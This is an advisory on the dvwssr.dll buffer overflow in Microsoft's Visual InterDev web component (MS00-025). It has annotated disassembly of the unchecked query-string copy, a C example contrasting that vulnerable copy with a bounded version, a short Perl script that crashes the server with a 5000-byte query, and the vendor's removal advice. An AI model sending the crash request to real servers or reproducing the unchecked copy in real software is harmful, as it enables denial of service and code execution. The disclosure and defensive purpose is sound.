Buffer Overflow in Microsoft Web Component
Reported April 14, 2000 by
rain.forrest.puppy and CORE SDI
VERSIONS AFFECTED
Visual InterDev 1.0 component that ships with:
  • Windows NT 4.0 Option Pack (primary distribution for IIS 4.0)
  • Personal Web Server 4.0 (ships as part of Win95/98)
  • FrontPage 98 Server Extensions

DESCRIPTION

The affected item, dvwssr.dll, is a server-side component used to support the Link View feature in Visual InterDev 1.0. The component contains a buffer overflow condition which, if overrun with random data, could crash the server and may even allow arbitrary code to run on the server in the context of the all-powerful System account.

According to Gerardo Richarte of CORE-SDI, the code where the buffer overflow resides is as follows:

mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString] ; eax = pointer to the client-supplied query string
test eax, eax
jz _text_581813FD                    ; no query string: skip the copy
push eax                             ; source: the query string (attacker controlled, unbounded)
lea eax, [esp+14h+queryStringCoph]   ; destination: fixed-size buffer on the stack
push eax
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
                                     ; lstrcpyA copies until the NUL; the length of the query
                                     ; string is never checked against the buffer size
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]   ; the copied (possibly oversized) string is then URL-decoded in place
push eax
call unescape_url
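
To show the defect in the disassembly in source form, the following is an added C example (not the dvwssr.dll code and not from the advisory's authors): the unbounded copy pattern next to a bounded replacement that rejects a query string which cannot fit. The `ecb_t` struct and the 256-byte buffer size are assumptions for illustration; the page does not state the real buffer size.

```c
#include <stddef.h>
#include <string.h>

/* The page does not give the stack buffer's size; 256 is assumed for illustration. */
#define QUERY_BUF_SIZE 256

/* Stand-in for the ISAPI EXTENSION_CONTROL_BLOCK with only the field the
   disassembly reads (hypothetical struct, not the SDK definition). */
typedef struct { const char *lpszQueryString; } ecb_t;

/* Vulnerable pattern from the disassembly: the client-controlled query string
   goes into a fixed buffer with no length check (strcpy stands in for lstrcpyA).
   Kept for contrast only; nothing below calls it. */
void copy_query_unchecked(const ecb_t *ecb, char *out)
{
    if (ecb->lpszQueryString)
        strcpy(out, ecb->lpszQueryString);
}

/* Hardened form: measure without reading past out_size, reject input that
   cannot fit with its NUL, leave out empty on failure. 1 = copied, 0 = rejected. */
int copy_query_checked(const ecb_t *ecb, char *out, size_t out_size)
{
    size_t len = 0;
    if (out_size == 0) return 0;
    out[0] = '\0';
    if (ecb->lpszQueryString == NULL) return 0;
    while (len < out_size && ecb->lpszQueryString[len] != '\0') len++;
    if (len >= out_size) return 0;              /* no room for the terminator */
    memcpy(out, ecb->lpszQueryString, len + 1);
    return 1;
}

/* A short query (constructed sample) fits and is accepted: returns 1. */
int demo_normal_accepted(void)
{
    char buf[QUERY_BUF_SIZE];
    ecb_t ecb = { "index.htm" };
    return copy_query_checked(&ecb, buf, sizeof buf);
}

/* The 5000 'a's the Perl script below sends are rejected instead of smashing
   the stack; returns 1 when rejected and buf is left empty. */
int demo_oversize_rejected(void)
{
    char big[5001], buf[QUERY_BUF_SIZE];
    memset(big, 'a', 5000); big[5000] = '\0';   /* constructed, like "a" x 5000 */
    ecb_t ecb = { big };
    return copy_query_checked(&ecb, buf, sizeof buf) == 0 && buf[0] == '\0';
}
```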

In addition to the overflow condition, Microsoft's bulletin indicates a potential permissions problem: "By default, the affected component, Dvwssr.dll, resides in a folder whose permissions only allow web authors to execute it. Under these conditions, only a person with web author privileges could exploit the vulnerability - but a web author already has the ability to upload and execute code of his choice, so this case represents little additional threat. However, if the permissions on the folder were set inappropriately, or the .dll were copied to a folder with lower permissions, it could be possible for other users to execute the component and exploit the vulnerability."

DEMONSTRATION

A simple PERL script can cause the crash:

#!/usr/bin/perl
# Emits one HTTP request whose query string is 5000 bytes long; pipe the
# output to the server to trigger the unbounded lstrcpyA in dvwssr.dll.
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";

VENDOR RESPONSE

Microsoft has issued a security bulletin (MS00-025) that recommends that users delete all copies of the dvwssr.dll file on their Web systems. Doing so will break the Link View functionality of Visual InterDev; however, since that package is so old, Microsoft feels that only a few users still use the older development platform and therefore only a few users will be affected by deleting the file. Be sure to read Support Online article Q259799.

To delete the file, use the "Find | Files or Folders" utility on the Start Menu to search all directories on your Web server file systems for "dvwssr.dll." The utility will locate all copies of the affected DLL. Once the search is complete, right-click on each instance of the file in the dialog and select Delete to remove the file from your system. Be sure to empty the Recycle Bin after you have deleted the files, so that no one can inadvertently restore those files back onto the system.

CREDITS
Discovered and reported by
rain.forrest.puppy and CORE-SDI